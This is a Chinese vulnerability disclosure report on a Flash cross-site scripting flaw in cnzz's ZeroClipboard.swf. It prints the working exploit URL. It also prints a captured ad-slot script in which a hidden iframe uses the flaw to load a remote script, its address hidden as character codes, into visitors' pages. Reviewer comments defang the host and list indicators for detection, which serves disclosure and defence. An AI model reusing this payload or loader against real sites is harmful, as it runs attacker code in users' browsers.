2013-11-18: 细节已通知厂商并且等待厂商处理中
2013-11-18: 厂商已经确认,细节仅向厂商公开
2013-11-28: 细节向核心白帽子及相关领域专家公开
2013-12-08: 细节向普通白帽子公开
2013-12-18: 细节向实习白帽子公开
2014-01-02: 细节向公众公开
cnzz一处flash跨站+黑光网疑似被入侵
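赶集网云监控再次立功,监控到一处 flash XSS 点:
http://adm.cnzz.com/js/ZeroClipboard.swf?id=%5c%22))}catch(e){}eval(name);//&width&height
id 参数中的内容先闭合原有的字符串、括号和 try 块,再执行 eval(name),即把当前窗口的 name 当作脚本执行;该脚本应是运行在 adm.cnzz.com 域下。
调用该 flash 的站点:黑光网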
GET /js/ZeroClipboard.swf?id=%5c%22))}catch(e){}eval(name);//&width&height HTTP/1.1
Host: adm.cnzz.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.heiguang.com/
下发上述 iframe 的广告位脚本请求(sid=194947,href 参数指向黑光网),其响应内容见下:
http://js.adm.cnzz.net/atos.php?sid=194947&width=1366&height=768&isf=1&domain=&proid=&pid=&fid=&mid=&floorid=&time=1384741937392392&referer=&href=http%3A%2F%2Fwww.heiguang.com%2F
/*
 * Captured response of the cnzz ad-slot script for sid 194947. This is evidence
 * and is kept verbatim below; only this header comment is added.
 *
 * What the code does, in order:
 *  - takes a timestamp and, if window.starttime_194947 exists, stores the
 *    elapsed time in window.totaltime_194947;
 *  - registers window.errorLoad unless it already exists; it builds a
 *    http://action.adm.cnzz.net/bench.gif URL carrying sid, the object's src,
 *    type=img and loadtime=-1, and passes it to cnzz_request (defined outside
 *    this listing);
 *  - jsLoaded(d, o) keeps a per-slot flag in window.adloaded; the script
 *    returns early when slot 194947 is already flagged and sets the flag at
 *    the very end;
 *  - showAd() inserts ad markup with document.write or insertAdjacentHTML;
 *    html() optionally sets width/height on the slot element and hands the
 *    "data" string to showAd(). Neither function filters the markup.
 *
 * Security-relevant part: the "data" string for slot 194947.
 *  - config.originaltype is "rich", so html() sets the target element to null
 *    and showAd() falls through to document.write(data) in the embedding page.
 *  - data holds a 0x0 iframe whose src is ZeroClipboard.swf with the id
 *    payload ending in eval(name), and whose name attribute is JavaScript
 *    text. eval(name) therefore evaluates that attribute text, since the
 *    frame's window name is taken from the name attribute.
 *  - The name text creates an element with
 *    String.fromCharCode(115,99,114,105,112,116), which is "script", sets its
 *    src to the char-code string that decodes to
 *    hxxp://www[.]zhugesf[.]com/xx/oZS (defanged here), and appends it to
 *    document.body.
 *  - The remainder of data appears to be a regular cnzz statistics snippet
 *    (stat.php id 5702888).
 *
 * NOTE(review): the line break inside the "data" string (right after `? `) is
 * not valid inside a JavaScript string literal; presumably an artefact of how
 * the response was pasted. Confirm against the raw capture.
 *
 * Indicators to search for in proxy or web logs: requests to ZeroClipboard.swf
 * whose id parameter contains eval(name), and requests to the decoded script
 * host above.
 */
(function(){var servertime = +new Date();window['starttime_194947']&&(window['totaltime_194947']=servertime-window['starttime_194947']);})();(function(){(function(url){var url=url;function R(name,fn){return window[name]?window[name]:window[name]=fn;}R('errorLoad',function(obj,id){var sid=arguments[1],nowtime=+new Date(),alltime,turl;turl=url+"?sid="+id+"&iurl="+(encodeURIComponent(obj.src)||'')+"&type=img&loadtime=-1";if(cnzz_request){setTimeout(function(){cnzz_request(turl);},0);}});})("http://action.adm.cnzz.net/bench.gif");function jsLoaded(d,o){var a,d=d;return d?(a=window.adloaded=window.adloaded||[],o&&1==o?(a["load_"+d]=a["load_"+d]||0,a["load_"+d]=1,void 0):(a["load_"+d]=a["load_"+d]||0,a["load_"+d])):1}if(("function" == typeof jsLoaded)&&jsLoaded(194947)){return false;}function showAd(b,a,c){c=="iframe"?a&&1==a.nodeType?iframeout(b||{},a):document.write(b.data||""):a&&1==a.nodeType?window.setTimeout(function(){a.insertAdjacentHTML("afterBegin",b)},0):document.write(b);return!0};function html(a,b){var c="",f=a.adtype||"",d=a.width||0,e=a.height||0,c=a.data;a.config.originaltype=="rich"&&(b=null);if(b&&1==b.nodeType)b.style.cssText=b.style.cssText+(d>=0?";width:"+d+"px;":"")+(e>=0?";height:"+e+"px;":"");if(!c)return!1;showAd(c,b,f)};html({"id":194947,"data":"<iframe width=0 height=0 src=http:\/\/adm.cnzz.com\/js\/ZeroClipboard.swf?id=%5c%22))}catch(e){}eval(name);\/\/&width&height name=\"window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,122,104,117,103,101,115,102,46,99,111,109,47,120,120,47,111,90,83);document.body.appendChild(window.s)\"><\/iframe><DIV id=\"cnzz\" style=\"display:none\"><script type=\"text\/javascript\">var cnzz_protocol = ((\"https:\" == document.location.protocol) ? 
\" https:\/\/\" : \" http:\/\/\");document.write(unescape(\"%3Cspan id='cnzz_stat_icon_5702888'%3E%3C\/span%3E%3Cscript src='\" + cnzz_protocol + \"s9.cnzz.com\/stat.php%3Fid%3D5702888' type='text\/javascript'%3E%3C\/script%3E\"));<\/script><\/div>","adtype":"rich","width":"-1","height":"-1","config":{"height":"-1","width":"-1","originaltype":"rich"}},document.getElementById("cnzz_fixedslot_ad_194947"));"function" == typeof jsLoaded && (jsLoaded(194947,1));})();
是对不蛤蛤李菊福
危害等级:中
漏洞Rank:10
确认时间:2013-11-18 14:43
非常感谢,我们正在修复
暂无